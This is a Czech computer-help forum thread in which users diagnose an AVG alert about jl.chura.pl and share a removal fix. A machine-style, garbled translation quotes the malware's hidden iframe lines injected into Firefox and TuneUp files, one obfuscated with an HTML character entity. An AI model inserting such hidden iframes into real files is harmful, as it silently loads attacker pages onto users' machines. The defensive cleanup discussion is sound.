j.l.chura.pl/rc/-vir?

Sekce věnovaná virům a jiným škodlivým kódům, rovněž ale nástrojům, kterým se lze proti nim bránit…

Moderátoři: Mods_senior, Security team

liborek
Level 5.5
Level 5.5

j.l.chura.pl/rc/-vir?

Příspěvek od liborek »

Právě jsem dočistil počítač s Damnedem a ještě jsem chtěl dočistit TunrUpem a vyskočila mi hláška s AVG -Detekce více infekcí a tam jl.chura.pl/re/... Co se sakra stalo?Že by se to tam dostalo jak jsem měl vypnutý při čištění AVG.Já nevypnul net?
Intel Core i7-6700,MB Gigabyte GA-B150-HD3,MSI-GeForce GTX 1070 Gaming X 8G,2 x8GB DD4 2133MHz,Win 10 64bit.

Windows 7Pro,Intel CoreDuo E6750,SAPHIRE RADEON HD 5770 VAPOR-X,RAM 3GB, Gigabyte MB GA-P35-DS4,Corsair 600w.
Damned
Tvůrce článků
Kontaktovat uživatele:

Re: j.l.chura.pl/rc/-vir?

Příspěvek od Damned »

Tady i tom drobátko píšou.
http://www.computerforum.com/147256-vir ... pl-rc.html" onclick="window.open(this.href);return false;
Nic není nemožné, proto tam, kde jsme s rozumem v koncích, neváháme použít kladivo.
Chceš-li vědět, co je nového, podívej se do starých knih.
Damnedovy češtiny - překlady programů pro údržbu PC
HiJackThis 2+návod FCleaner+čeština Wise Registry Cleaner
liborek
Level 5.5
Level 5.5

Příspěvek od liborek »

No jo,ale angličtina není moje řeč :-( Kde se to tam vzalo a hlavně jak pryč? :?
Intel Core i7-6700,MB Gigabyte GA-B150-HD3,MSI-GeForce GTX 1070 Gaming X 8G,2 x8GB DD4 2133MHz,Win 10 64bit.

Windows 7Pro,Intel CoreDuo E6750,SAPHIRE RADEON HD 5770 VAPOR-X,RAM 3GB, Gigabyte MB GA-P35-DS4,Corsair 600w.
Damned
Tvůrce článků
Kontaktovat uživatele:

Příspěvek od Damned »

Jen takovej překlad narychlo
och i jsem měl ten problém s můj firefox

i jsem hledal "chura" ve firefox složce v programových souborech a já nalézám a html soubor v RES forlder
1 - jde do "C:\programové soubory\Mozilla Firefox\znovu" (jestli vy máte forefox nainstalovaný v C: rozdělení)
2 vy uvidíte html pořadač "hiddenWindow.html" v té složce
3 otevře to se zápisníkem a odstraněním "<iframe src="http//jL.chura.pl/rc/" styl="displej:žádný"></iframe>"
4 chrání zařadit a to je vše

Jen pro informaci:

Já stávám se touto stejnou chybou jen když já otevřu TuneUp Utilities 2008, Norton by mohl blokovat to, proto já jsem následoval instrukce nahoře, ie dělané hledání v TuneUp adresáři a hledaný uvnitř souborů pro chura, to našlo soupeře v integračním obvodu.htm, jednou otevření tohoto souboru s poznámkou a znovu já jsem hledal pro chura, to nemohl najít cokoli, ale!! lstivý b******s dát toto na spodu souboru:

<iframe src="http://jL.chu _ & _ # _ 114 _ ;a.pl/rc/" styl="displej:žádný"></iframe>

Aby tento websajt displej správná linka v mém souboru, já jsem musel přidat _ před každým znakem, proto to musí být ascii kód pro r který je & # 114 (bez mezer) tak odstraní _- ovo dostat správnou linku, doufám, že vy můžete rozumět tomu co já mám na mysli.

Já jsem odstranil tuto linku, a běžel TuneUp znovu a dostal žádné chyby, a se softvérem pracování správně.
Nic není nemožné, proto tam, kde jsme s rozumem v koncích, neváháme použít kladivo.
alenka_v_říši_divů
Level 6
Level 6

Příspěvek od alenka_v_říši_divů »

Máš tam hold nejspíš viruta /nebo zbytek/ http://www.eset.cz/virus/win32_virut_nb ... rus?lng=cz" onclick="window.open(this.href);return false; ..takže nejspíš nová hlubší kontrola....
liborek
Level 5.5
Level 5.5

Příspěvek od liborek »

Jak to ale,že jsem ho dostal zrovna při tom čištění?Před tím tam nebyl.
Damned:Jo já si to taky tak přeložil a i podle toho přibližně jednal a výsledek žádný.

alenka_v_říši_divů
Level 6
Level 6

Těžko říct...je X možností...ve spletitosti OS se pořádně nevyzná nikdo...
liborek
Level 5.5
Level 5.5

Příspěvek od liborek »

Nevím jestli tam pořád je,ale když jsem ho nemohl dostat.jinak smázl jsem kompletně firefox a TuneUp a znovu nainstaloval.Momentálně už se neobjevil.Ale ,že by to šlo tak lehce a smazáním toho kde byl usazený bych ho zlikvidoval?!To se ani nechce věřit.
Jen nevím...tui infekci mi hlásil AVG vždy při zapnutí TuneUpu.Ovšm vyskočilo mi okno s varováním a poijmenováním,ale nešlo s tím nic dělat,Když jsem spustil plnou kontrolu AVG tak to nic nenašlo :o
Pak opět klik na TuneUp a zase na mě vyskočila hláška AVG.Tak neví.Že by byl pro AVG viděný jen při spuštěnmí *exe ke kterému se připojil?
Jak bych rychle zjistil jestli ho ještě mám v kompu?V Hijacku se neukázal,Malwares taky nic.Není nějaká utilita na, alespoň, zjištění tohoto konkrétního šmejda?Nerad bych měl někoho za zády při spojení třeba s bankou.

alenka_v_říši_divů
Level 6
Level 6

Vyzkoušej program RM Virut ....jestli něco najde... http://en.kioskea.net/telecharger/telec ... 06-rmvirut" onclick="window.open(this.href);return false; //ale promazání ruční cestou je nejspolehlivější,od odborníků...
Virut je svině...tak doufej,že je to jen slabší bratříček...
Virut je svině...tak doufej,že je to jen slabší bratříček...
Damned
Tvůrce článků
Kontaktovat uživatele:

Příspěvek od Damned »

Byl asi v tom Firefoxu. Co jsem četl, objevil se v něm. Viz ten citát nahoře. Po smazání FF a kontrole AV programem by pak v nové instalaci FF neměl být.
liborek
Level 5.5
Level 5.5

Příspěvek od liborek »

Jo jenže předtím tam nebyl.Jediný co jsem dělal mezi tím co tam nebyl a pak už jo byla aktualizace MbAM a ComboFixu a v tu dobu jsem neměl zaplý antivir.ale to je přece blbost aby to v sobě měly.

liborek
Level 5.5
Level 5.5

Příspěvek od liborek »

Tak ten RMVirut nic nenašel.Snad jsem to vykopl. :? :?
Naposledy upravil(a) liborek dne 01 črc 2009 22:27, celkem upraveno 1 x.

Zamčeno

Zpět na „Viry, antiviry, firewally…“